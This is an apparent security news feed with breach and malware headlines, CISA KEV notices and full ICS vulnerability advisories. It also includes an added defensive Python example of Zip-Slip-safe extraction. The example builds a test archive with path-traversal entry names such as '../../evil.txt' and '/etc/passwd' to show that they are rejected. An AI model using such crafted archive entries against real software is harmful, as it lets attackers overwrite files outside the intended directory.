Former cybersecurity executive Peter Williams stole several surveillance and hacking tools and sold them for $1.3 million to a Russian broker that works with Putin’s government.

NVIDIA confirms GeForce NOW data breach affecting Armenian users

NVIDIA has confirmed in a statement for BleepingComputer that GeForce NOW user information has been exposed in a data breach. [...]

Kelp DAO exploit prompts DeFi protocols to rethink oracle providers

Solv Protocol and other DeFi projects are migrating to Chainlink infrastructure after the $293 million exploit exposed risks in third-party bridge and oracle setups.

Why More Analysts Won’t Solve Your SOC’s Alert Problem

Attackers move faster than overwhelmed SOC teams can realistically investigate alerts. Prophet Security breaks down how AI can help analysts investigate alerts faster and focus on real threats. [...]

Europe sees ‘hyperconcentration’ of crypto wrench attacks as losses hit $101M

Criminal teams behind wrench attacks usually consist of three to five people, often posing as delivery drivers or luring victims into ambushes, said CertiK.

Trellix source code breach claimed by RansomHouse hackers

The attack on the Trellix source code repository disclosed last week has been claimed by the RansomHouse threat group, which leaked a small set of images as proof of the intrusion. [...]

Otto Support - The Confused Deputy

When an agent reads attacker-controlled content and acts on it using its own privileges, the user's name ends up on every audit log entry. From Microsoft Copilot to ConfusedPilot, this post walks through how confused deputy attacks work and the layered controls that help contain them.

CISA gives feds four days to patch Ivanti flaw exploited as zero-day

CISA has given U.S. federal agencies four days to secure their networks against a high-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
- CVE-2026-42208 BerriAI LiteLLM SQL Injection Vulnerability
This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Mantle tokenholders approve 30K ETH Aave credit facility after rsETH exploit

The credit facility would help Aave address bad debt created after the April rsETH exploit strained its WETH market.

Zara data breach exposed personal information of 197,000 people

Hackers who gained access to the databases of Spanish fast-fashion retailer Zara stole data belonging to more than 197,000 customers, according to data breach notification service Have I Been Pwned. [...]

New Linux 'Dirty Frag' zero-day gives root on all major distros

A new Linux zero-day exploit, named Dirty Frag, allows local attackers to gain root privileges on most major Linux distributions with a single command. [...]

Canvas Breach Disrupts Schools & Colleges Nationwide

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service's login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

Canvas login portals hacked in mass ShinyHunters extortion campaign

The ShinyHunters extortion gang has breached education technology giant Instructure again, this time exploiting another vulnerability to deface Canvas login portals for hundreds of colleges and universities. [...]

New TCLBanker malware self-spreads over WhatsApp and Outlook

A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, uses a trojanized MSI installer for Logitech AI Prompt Builder to infect systems. [...]

After Replacing TeamPCP Malware, 'PCPJack' Steals Cloud Secrets

PCPJack makes innovative use of parquet files for stealthy, pre-validated target discovery as it canvasses multiple cloud environments.

New PCPJack worm steals credentials, cleans TeamPCP infections

A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP's access to the systems. [...]

Australia warns of ClickFix attacks pushing Vidar Stealer malware

The Australian Cyber Security Center (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. [...]

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Ivanti warns of new EPMM flaw exploited in zero-day attacks

Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]

AI-Driven Cyberattack on Mexico Couldn't Breach OT Systems

The most sophisticated AI-integrated campaign to date hit a brick wall in the form of a SCADA login screen.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
- CVE-2026-6973 Ivanti Endpoint Manager Mobile (EPMM) Improper Input Validation Vulnerability
This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

MAXHUB Pivot Client Application

Summary
Successful exploitation of this vulnerability may enable an attacker to access tenant email addresses and associated information in cleartext or cause a denial-of-service condition.

The following versions of the MAXHUB Pivot client application are affected:
- MAXHUB Pivot client application, versions prior to v1.36.2 (CVE-2026-6411)

Vendor: MAXHUB
Equipment: MAXHUB Pivot client application
Vulnerability: Use of a Broken or Risky Cryptographic Algorithm (CWE-327)
CVSS v3.1 base score: 7.3 (HIGH); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Background
Critical Infrastructure Sectors: Information Technology
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities
CVE-2026-6411: This vulnerability, in the MAXHUB Pivot client application versions prior to v1.36.2, may allow an attacker to obtain encrypted tenant email addresses and related metadata from any tenant. Due to the presence of a hardcoded AES key within the application, the encrypted data can be decrypted, enabling access to tenant email addresses and associated information in cleartext. Furthermore, an attacker may be able to cause a denial-of-service condition by enrolling multiple unauthorized devices into a tenant via MQTT, potentially disrupting tenant operations.

Affected Products
MAXHUB Pivot client application (vendor: MAXHUB), versions <v1.36.2. Product status: known_affected.

Remediations
Mitigation: MAXHUB recommends users upgrade the Pivot client application to v1.36.2 or newer. The remediation has been made available through an OTA update. Users running v1.36.2 or later are not affected and need only ensure they continue to maintain the latest version. At this time, MAXHUB is not aware of any public exploitation of this issue. For more information, see the MAXHUB support page: https://www.maxhub.com/en/support/

Acknowledgments
Malik MAKKES and Yassine BENGANA of Abicom Groupe OCI reported this vulnerability to MAXHUB.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-05-07
- 2026-05-07, Revision 1: Initial Publication

A Vulnerability in PAN-OS Could Allow for Remote Code Execution

A vulnerability has been discovered in the PAN-OS Authentication Portal (aka Captive Portal) service that could allow for remote code execution. PAN-OS is the operating system that runs Palo Alto Networks next-generation firewalls. Successful exploitation could allow an unauthenticated remote attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets.

VoidStealer Malware Darts Past Google Chrome's Encryption

Authors of the VoidStealer Trojan uncovered yet another way to get around Google's App-Bound Encryption (ABE), opening the door to infostealers.

Instructure Breach Exposes Schools' Vendor Dependence

ShinyHunters' attack on Instructure, which owns the widely used Canvas learning management system (LMS), carries big questions about the trust educational institutions put into their vendors.

A Vulnerability in Apache HTTP Server Could Allow for Remote Code Execution

A vulnerability has been discovered in Apache HTTP Server with the HTTP/2 protocol that could allow for remote code execution. Apache is a free, open-source web server software that enables the delivery of web content over the internet. Successful exploitation could result in denial of service, crashing worker processes with minimal effort. In certain setups, especially those using APR with mmap (common on Debian systems and official Docker images), it may also be exploited for remote code execution.

CVE-2026-42208: Pre-Authentication SQL Injection in LiteLLM Proxy

Bishop Fox researchers confirmed a critical pre-authentication SQL injection in LiteLLM proxy affecting versions 1.81.16 through 1.83.6. Attackers can exploit it without credentials, and it blends into normal logs. In-the-wild exploitation was observed within 36 hours of the advisory going public.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-0300 Palo Alto Networks PAN-OS Out-of-bounds Write Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Attacks Abuse Windows Phone Link to Steal Texts & Bypass 2FA

In hard-to-detect attacks, hackers are dropping the CloudZ RAT and a fresh plug-in, Pheno, to hijack the Windows-based bridge between PCs and smartphones.

Middle East Cyber Battle Field Broadens — Especially in UAE

As the war with Iran continues, breach attempts targeting the United Arab Emirates tripled in a few weeks — many targeting critical infrastructure.

Trellix Source Code Breach Highlights Growing Supply Chain Threats

Info is scant, but such breaches can reveal where a security product's controls are located and how detections are designed, giving attackers a leg up.

Research Hub Bridges Cybersecurity Gap for Under-Resourced Organizations

The UC Berkeley Center for Long-Term Cybersecurity (CLTC) offers tools and support to schools, local governments, and non-profits as they defend themselves against a growing volume of cyberattacks.

Student hacked Taiwan high-speed rail to trigger emergency brakes

A 23-year-old university student in Taiwan was arrested for interfering with the TETRA communication system used by the country's high-speed railway network (THSR). [...]

Kaspersky suspects Chinese hackers planted a backdoor into Daemon Tools in ‘widespread’ attack

The cybersecurity company says it's seen thousands of infection attempts, and at least a dozen successful hacks after users installed malicious versions of the popular Windows software.

Microsoft Edge Stores Passwords in Process Memory, Posing Enterprise Risk

A proof-of-concept exploit (PoC) shows how someone with admin privileges can exploit the issue to steal passwords, and thus use them to engage in further malicious activity.

Hackers steal students’ data during breach at education tech giant Instructure

The data breach at education tech giant Instructure includes students' private data, according to a sample of the allegedly stolen data seen by TechCrunch.

Vimeo data breach exposes personal information of 119,000 people

The ShinyHunters extortion gang stole personal information belonging to over 119,000 people after hacking the Vimeo online video platform in April, according to data breach notification service Have I Been Pwned. [...]

ABB B&R Automation Runtime

Summary
ABB became aware of a vulnerability in the product versions listed as affected in the advisory. An update is available that resolves the vulnerability. An attacker who successfully exploited this vulnerability could cause the product to stop.

The following versions of ABB B&R Automation Runtime are affected:
- Automation Runtime <6.5, >=6.5, =R4.93 (CVE-2025-11044)

Vendor: ABB
Equipment: ABB B&R Automation Runtime
Vulnerability: Allocation of Resources Without Limits or Throttling (CWE-770)
CVSS v3.1 base score: 6.8 (MEDIUM); vector string CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H/RL:O/RC:C

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities
CVE-2025-11044: An Allocation of Resources Without Limits or Throttling vulnerability in the ANSL-Server component of B&R Automation Runtime versions prior to 6.5 and prior to R4.93 could be exploited by an unauthenticated attacker on the network to win a race condition, resulting in permanent denial-of-service (DoS) conditions on affected devices.

Affected Products
ABB B&R Automation Runtime (vendor: ABB): ABB Automation Runtime <6.5, ABB Automation Runtime <R4.93. Product status: fixed, known_affected.

Remediations
Vendor fix: The problem is corrected in the following product versions:
- Automation Runtime 6 versions >= 6.5
- Automation Runtime 4 versions >= R4.93
B&R recommends that customers apply the update at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.

Mitigation: The vulnerability cannot be exploited on all devices or across all customer applications. Extensive investigations by B&R have determined that shorter cycle times in customer projects increase the likelihood of potential exploitation. For customers unable to transition to a patched version, adjusting their application configuration to longer cycle times may therefore be considered as a mitigating measure. B&R Automation Runtime is designed to be operated on Level 1 of the ABB ICS Cyber Security Reference Architecture. Exploitation of the vulnerability from outside Level 1 would require an attacker to bypass the Control Network Firewall. Limiting the maximum data traffic and the maximum number of concurrent connections to the ANSL server of Automation Runtime on the Control Network Firewall shall be considered to mitigate this vulnerability. B&R further recommends, in alignment with its Defense in Depth for B&R Products guidelines, that customers:
- Test the maximum load capacity of their application under Automation Runtime before commissioning.
- Restrict the permitted data traffic to the device via the Control Network Firewall to no more than 80% of the measured peak traffic value.
Refer to section "General security recommendations" for further advice on how to keep your system secure.

Acknowledgments
ABB PSIRT reported this vulnerability to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions
What causes the vulnerability?
- The vulnerability is caused by an insufficient throttling and limiting mechanism in the ANSL Server used by the B&R Automation Runtime.
What might an attacker use the vulnerability to do?
- An attacker who successfully exploited this vulnerability could cause the affected system node to stop.
How could an attacker exploit the vulnerability?
- An attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors above.
Could the vulnerability be exploited remotely?
- Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.
What does the update do?
- The update removes the vulnerability by limiting incoming network traffic that is handled by the ANSL server component.
When this security advisory was issued, had this vulnerability been publicly disclosed?
- No, B&R discovered this vulnerability as a part of its own security analysis.
When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited?
- No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT SA25P005 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-01-19
- 2026-01-19, Revision 1: Initial version.
- 2026-05-05, Revision 2: Initial CISA Republication of ABB PSIRT SA25P005 advisory

Hitachi Energy PCM600

Summary
Hitachi Energy is aware of a vulnerability that affects the Hitachi Energy PCM600 product versions listed in this document. An attacker successfully exploiting this vulnerability can impact the integrity of the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.

The following versions of Hitachi Energy PCM600 are affected:
- PCM600 Legacy <=2.11 (CVE-2018-1002208)
- PCM600 3.0, 3.0_HF1, 3.0_HF2, 3.0_HF3, 3.1, 3.1_SP1, 3.1_SP2, 3.1_SP3 (CVE-2018-1002208)

Vendor: Hitachi Energy
Equipment: Hitachi Energy PCM600
Vulnerability: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
CVSS v3.1 base score: 4.4 (MEDIUM); vector string CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N

Background
Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities
CVE-2018-1002208: SharpZipLib before 1.0 RC1 is vulnerable to directory traversal, allowing attackers to write to arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as 'Zip-Slip'.

Affected Products
Hitachi Energy PCM600 (vendor: Hitachi Energy): PCM600 Legacy Version 2.11 and earlier, PCM600 3.0, PCM600 3.0 HF1, PCM600 3.0 HF2, PCM600 3.0 HF3, PCM600 3.1, PCM600 3.1 SP1, PCM600 3.1 SP2, PCM600 3.1 SP3. Product status: known_affected.

Remediations
None available: Prior to acquisition, PCM600 product versions 2.11 and earlier were distributed under ABB's organization. Some Hitachi Energy users may still be operating these legacy versions. While ABB continues to maintain the PCM600 2.x product line, Hitachi Energy now exclusively maintains and distributes the PCM600 3.x product line. ABB has recently published a cybersecurity advisory, 2NGA002813 (https://library.e.abb.com/public/ec33308ad2c34f92bab09df09c66954d/2NGA002813_PCM600_Sharpziplib_Vulnerability.pdf), with their recommended actions for this same vulnerability. However, because Hitachi Energy does not maintain or validate the PCM600 2.x releases, they cannot assess or guarantee the compatibility of ABB's recommended updates with other Hitachi Energy IEDs (Relion 670 series, 650 series, SAM600, PWC600). PCM600 versions 3.0 and later are the Hitachi Energy maintained and validated versions; Hitachi Energy strongly recommends that users migrate to these versions. Additionally, please follow Hitachi Energy's Industrial Control Systems Best Practices (https://publisher.hitachienergy.com/preview?DocumentID=8DBD000235&LanguageCode=en&DocumentPartId=&Action=Launch) until the planned remediation is released. Contact your support representative for more detailed guidance tailored to your deployment.

Mitigation: Ensure that Chapter 4 of Cyber Security Deployment Guideline - 1MRK505410 has been followed during the deployment. Ensure that no default credentials are in use. In case of exceptions, please ensure they have been mitigated with adequate countermeasures.

Vendor fix: Update to PCM600 3.1 SP4 (update planned).

Acknowledgments
Hitachi Energy reported this vulnerability to CISA.

Notice
The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Support
For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact centers.

General Mitigation Factors
It is highly recommended to deploy the product following the "PCM600 3.1 Cyber Security Deployment Guideline" document. Customers should maintain their systems with products running on supported versions and follow maintenance releases. Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.

SSVC
SSVCv2/E:N/A:N/2026-04-24T14:16:01Z/

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Hitachi Energy 8DBD000239 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-28
- 2026-04-28, Revision 1: Initial public release
- 2026-05-05, Revision 2: Initial CISA Republication of Hitachi Energy 8DBD000239 advisory
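The Zip-Slip weakness described in the PCM600 advisory above is a failure of the extraction routine to validate entry names, so an entry such as ../../something is written outside the intended directory. The following is an added illustration of the defensive check an extractor should apply; it is not code from Hitachi Energy, ABB or SharpZipLib, and the archive it unpacks is constructed inline (one benign entry, one dot-dot-slash entry, one absolute-path entry) purely for demonstration.

```python
"""Zip-Slip hardened extraction (added example; not Hitachi Energy, ABB or SharpZipLib code)."""
import io
import os
import tempfile
import zipfile
from pathlib import PurePosixPath


def is_safe_member(name: str) -> bool:
    """Reject archive entry names that could escape the extraction root.

    Zip entries are supposed to use '/' separators, but some writers emit
    backslashes, so both are normalised before checking. Absolute paths,
    Windows drive letters and any '..' component are refused outright.
    """
    normalised = name.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    return ".." not in PurePosixPath(normalised).parts


def safe_extract(zip_bytes: bytes, dest: str):
    """Extract an in-memory zip into dest, skipping traversal entries.

    Returns (extracted_names, rejected_names). The name check is backed by
    a second, path-based check: the resolved target must stay under dest,
    which also catches anything the name filter might miss.
    """
    dest_root = os.path.realpath(dest)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not is_safe_member(name):
                rejected.append(name)
                continue
            target = os.path.realpath(os.path.join(dest_root, name.replace("\\", "/")))
            if os.path.commonpath([dest_root, target]) != dest_root:
                rejected.append(name)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(name)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed sample: one benign entry plus two Zip-Slip style entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config/settings.xml", "<settings/>")
        zf.writestr("../../evil.txt", "would land outside the destination")
        zf.writestr("/etc/passwd", "absolute path, also refused")
    return buf.getvalue()


def demo():
    """Extract the constructed archive into a temp dir; report what happened."""
    with tempfile.TemporaryDirectory() as dest:
        extracted, rejected = safe_extract(build_sample_archive(), dest)
        benign_present = os.path.isfile(os.path.join(dest, "config", "settings.xml"))
    return extracted, rejected, benign_present


if __name__ == "__main__":
    print(demo())
```

Both checks are kept because they fail differently: the name filter gives a clear, loggable reason per entry, while the realpath/commonpath comparison is the ground truth about where the bytes would actually be written. A logged rejection of an entry name containing ../ is also a useful detection signal when archives arrive from untrusted sources.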

Johnson Controls CEM AC2000

Summary
Successful exploitation of this vulnerability could allow a standard user to escalate privileges on the host machine.

The following versions of Johnson Controls CEM AC2000 are affected:
- CEM AC2000 12.0 (CVE-2026-21661)
- CEM AC2000 11.0 (CVE-2026-21661)
- CEM AC2000 10.6 (CVE-2026-21661)

Vendor: Johnson Controls Inc.
Equipment: Johnson Controls CEM AC2000
Vulnerability: Uncontrolled Search Path Element (CWE-427)
CVSS v3.1 base score: 8.7 (HIGH); vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Background
Critical Infrastructure Sectors: Critical Manufacturing, Commercial Facilities, Government Services and Facilities, Transportation Systems, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Ireland

Vulnerabilities
CVE-2026-21661: The affected product is vulnerable to DLL hijacking, which could allow an attacker to escalate standard user privileges on the host machine.

Affected Products
Johnson Controls CEM AC2000 (vendor: Johnson Controls Inc.): versions 12.0, 11.0, 10.6. Product status: known_affected.

Remediations
Johnson Controls recommends users apply the following mitigations:
- Upgrade CEM AC 2000 12.0 to 12.0 Release 10.
- Upgrade CEM AC 2000 11.0 to 11.0 Release 9.
- Upgrade CEM AC 2000 10.6 to 10.6 Release 3.
- For more detailed mitigation instructions, please see the Johnson Controls Product Security Advisory: https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories

Acknowledgments
Tom Hulme of CSACyber reported this vulnerability to Johnson Controls.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

Revision History
Initial Release Date: 2026-05-05
- 2026-05-05, Revision 1: Initial Republication of Johnson Controls product security advisory.

ABB B&R PVI

Summary
ABB became aware of a vulnerability in the product versions listed as affected in the advisory. An update is now available that addresses and remediates the vulnerability. An attacker who successfully exploited this vulnerability could read sensitive information in the logging data of the PVI client application. Logging is deactivated by default in all PVI client versions.

The following versions of ABB B&R PVI are affected:
- PVI <6.5.0, 6.5.0 (CVE-2026-0936)

Vendor: ABB
Equipment: ABB B&R PVI
Vulnerability: Insertion of Sensitive Information into Log File (CWE-532)
